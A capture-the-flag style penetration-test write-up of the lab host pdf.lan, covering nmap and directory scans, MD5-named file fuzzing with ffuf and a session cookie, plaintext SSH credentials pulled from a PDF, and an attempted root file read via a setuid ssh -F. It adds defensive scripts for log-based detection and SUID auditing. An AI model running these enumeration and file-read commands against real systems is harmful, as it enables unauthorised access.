This post records a penetration test of the lab machine pdf.lan. First, reading the page source on port 80 and running a directory scan turned up hint.txt, which yielded the key credential 42 and allowed login to the File Management System on port 8080. Next, a script generated a dictionary of the MD5 hashes of 1-100, the system was fuzzed with it to locate one unusual PDF file, and the strings command extracted the SSH credentials welcome:lamar57 from that file. In the privilege-escalation phase, /usr/bin/ssh was found to carry the SUID bit and ssh -F was tried as a way to read arbitrary files, but because the error output converts the content to lowercase, the extracted private key could not be used to escalate.

Information Gathering

# Nmap 7.95 scan initiated Tue Dec 16 11:56:36 2025 as: /usr/lib/nmap/nmap --privileged -Pn -p22,80,8080 -sC -sV -oA ./Recon/192.168.110.57 192.168.110.57
Nmap scan report for pdf.lan (192.168.110.57)
Host is up (0.00076s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: The Evolution of PDF Format
8080/tcp open  http    Golang net/http server
|_http-title: File Management System
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.0 200 OK
|     Date: Tue, 16 Dec 2025 11:56:49 GMT
|     Content-Length: 1415
|     Content-Type: text/html; charset=utf-8
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <title>File Management System</title>
|     <style>
|     body { font-family: Arial, sans-serif; margin: 40px; background-color: #f4f4f4; }
|     .container { max-width: 800px; margin: auto; padding: 20px; background: white; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
|     text-align: center; color: #333; }
|     .error { color: red; text-align: center; }
|     .hint { color: #555; text-align: center; font-style: italic; }
|     input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 4px; }
|     button { width: 100%; padding: 10px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer; }
|_    button
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

Vulnerability Analysis

http://192.168.110.57/ // viewing the page source, line 338 contains <!-- hint: .txt -->

➜  Pdf gobuster dir -u http://192.168.110.57/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.110.57/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/hint.txt             (Status: 200) [Size: 44]
/server-status        (Status: 403) [Size: 279]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================

➜  curl http://192.168.110.57/hint.txt   → number 42

➜  http://192.168.110.57:8080/ // entering 42 grants access

The file lookup turned out to use the MD5 of the file name (the file "1" is stored under its MD5 hash), so we generate the names MD5(1..100).pdf as a wordlist.

for i in {1..100}; do
	hash=$(echo -n "$i" | md5sum | awk '{print $1}')   # MD5 of the decimal string, without a trailing newline
	echo "${hash}.pdf" >> payload_list.txt              # one candidate file name per line
done
ffuf -u http://192.168.110.57:8080/view/\?filename\=FUZZ -w payload_list.txt -b "session_token=42" -fs 1779,1193
# Found 72b32a1f754ba1c09b3695e0cb6cde7f.pdf [Status: 200, Size: 1219, Words: 108, Lines: 81, Duration: 9ms]
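The enumeration above leaves a very recognisable trace on the server: one client requesting many distinct /view/?filename=<32 hex chars>.pdf names in quick succession, almost all answered with 404. The following script is an added example, not part of the original writeup, showing how a defender would pick that pattern out of a web access log. The log lines are constructed to mirror the fuzzing run (common log format, hashes of small integers, one 200 for the file that existed); the function and file names are my own.

```bash
#!/bin/sh
# Added example: detect file-name enumeration against /view/?filename=<md5>.pdf
# in a common-log-format access log. Sample data is constructed, not captured.

# Write a constructed access log to the path in $1. 192.168.110.5 plays the
# fuzzer (six distinct misses, one duplicate, one hit); 10.0.0.9 is normal use.
write_sample_log() {
  cat > "$1" <<'EOF'
192.168.110.5 - - [16/Dec/2025:12:01:01 +0000] "GET /view/?filename=c4ca4238a0b923820dcc509a6f75849b.pdf HTTP/1.1" 404 1193
192.168.110.5 - - [16/Dec/2025:12:01:01 +0000] "GET /view/?filename=c81e728d9d4c2f636f067f89cc14862c.pdf HTTP/1.1" 404 1193
192.168.110.5 - - [16/Dec/2025:12:01:01 +0000] "GET /view/?filename=c81e728d9d4c2f636f067f89cc14862c.pdf HTTP/1.1" 404 1193
192.168.110.5 - - [16/Dec/2025:12:01:01 +0000] "GET /view/?filename=eccbc87e4b5ce2fe28308fd9f2a7baf3.pdf HTTP/1.1" 404 1193
192.168.110.5 - - [16/Dec/2025:12:01:02 +0000] "GET /view/?filename=a87ff679a2f3e71d9181a67b7542122c.pdf HTTP/1.1" 404 1193
192.168.110.5 - - [16/Dec/2025:12:01:02 +0000] "GET /view/?filename=e4da3b7fbbce2345d7772b0674a318d5.pdf HTTP/1.1" 404 1193
192.168.110.5 - - [16/Dec/2025:12:01:02 +0000] "GET /view/?filename=1679091c5a880faf6fb5e6087eb1b2dc.pdf HTTP/1.1" 404 1193
192.168.110.5 - - [16/Dec/2025:12:01:02 +0000] "GET /view/?filename=72b32a1f754ba1c09b3695e0cb6cde7f.pdf HTTP/1.1" 200 1219
10.0.0.9 - - [16/Dec/2025:12:05:00 +0000] "GET /view/?filename=c4ca4238a0b923820dcc509a6f75849b.pdf HTTP/1.1" 404 1193
10.0.0.9 - - [16/Dec/2025:12:05:04 +0000] "GET /view/?filename=72b32a1f754ba1c09b3695e0cb6cde7f.pdf HTTP/1.1" 200 1219
EOF
}

# Print "<ip> <count>" for every client with at least $2 (default 5) *distinct*
# hash-named /view requests that returned 404. Duplicates of the same name are
# counted once, so a retry storm does not inflate the score; hits (200) are ignored.
flag_enumerators() {
  log="$1"; threshold="${2:-5}"
  awk -v thr="$threshold" '
    # $1 = client IP, $7 = request path, $9 = status (common log format)
    # "/view/?filename=" (16) + 32 hex + ".pdf" (4) = 52 characters
    $9 == 404 && length($7) == 52 && $7 ~ /^\/view\/\?filename=[0-9a-f]+\.pdf$/ {
      key = $1 SUBSEP $7
      if (!(key in seen)) { seen[key] = 1; misses[$1]++ }
    }
    END { for (ip in misses) if (misses[ip] >= thr) print ip, misses[ip] }
  ' "$log" | sort
}

# Usage: write_sample_log /tmp/access.log; flag_enumerators /tmp/access.log 5
```

Counting distinct names rather than raw requests is the important design choice: a user reloading a missing file a few times looks like a retry, while a wordlist walk produces a new name on nearly every line. In production the same awk filter would run over the Go server's real access log with the threshold tuned to the site's normal miss rate.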

Exploitation

Save the unusual PDF file locally.

strings id_57.pdf yields welcome:lamar57

Privilege Escalation

welcome@pdf:~$ find / -perm -4000 2>/dev/null
/usr/bin/ssh
LFILE=/root/root.txt
ssh -F $LFILE localhost
# Cannot read /root/.ssh/id_rsa, because everything read back is lowercased
# No escalation path found
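The root cause on the defensive side is simply that /usr/bin/ssh should never be setuid: on Debian the only setuid piece of OpenSSH is the /usr/lib/openssh/ssh-keysign helper, and the client binary gaining that bit is a configuration error worth catching before anyone tries ssh -F with it. (The lowercasing the author ran into is ssh's config parser normalising each rejected keyword before printing "Bad configuration option", which mangles base64 key material.) Below is an added example, not from the original writeup, of a small SUID audit that diffs the live list against a known-good baseline; the scan and baseline contents are constructed, and the function names are my own.

```bash
#!/bin/sh
# Added example: report SUID binaries that are not in a known-good baseline.
# Sample scan and baseline are constructed; collect_suid() gathers the real list.

# Live collection: every setuid regular file on local filesystems, sorted.
# Not used by the self-test below, which works on constructed data.
collect_suid() {
  find / -xdev -type f -perm -4000 2>/dev/null | sort
}

# Write a constructed "find / -perm -4000" result to $1, standing in for the
# pdf.lan scan above (the extra /usr/bin/ssh is the finding to catch).
write_sample_scan() {
  cat > "$1" <<'EOF'
/usr/bin/ssh
/usr/bin/su
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
EOF
}

# Write a constructed baseline of SUID paths expected on this image to $1.
# A real baseline is recorded from a clean install of the same release.
write_baseline() {
  cat > "$1" <<'EOF'
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
EOF
}

# Print every path present in scan file $1 but absent from baseline file $2.
# comm requires sorted input; -23 keeps only lines unique to the first file.
unexpected_suid() {
  scan="$1"; base="$2"
  sort -u "$scan" > "$scan.sorted"
  sort -u "$base" > "$base.sorted"
  comm -23 "$scan.sorted" "$base.sorted"
  rm -f "$scan.sorted" "$base.sorted"
}

# For each unexpected path that exists on this host, show mode and owner so the
# reviewer can confirm the bit is really set (output depends on the host).
describe_unexpected() {
  unexpected_suid "$1" "$2" | while read -r p; do
    [ -e "$p" ] && ls -l "$p"
  done
}

# Usage: collect_suid > /tmp/scan.txt; unexpected_suid /tmp/scan.txt /etc/suid-baseline.txt
```

Run periodically, the diff turns a one-line `find` into a change alert: anything new in the output is either a package that legitimately added a setuid helper (add it to the baseline after review) or, as here, a binary that should have its SUID bit removed with `chmod u-s`.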

Lessons Learned

Did not follow up firmly enough on 72b32a1f754ba1c09b3695e0cb6cde7f.pdf.
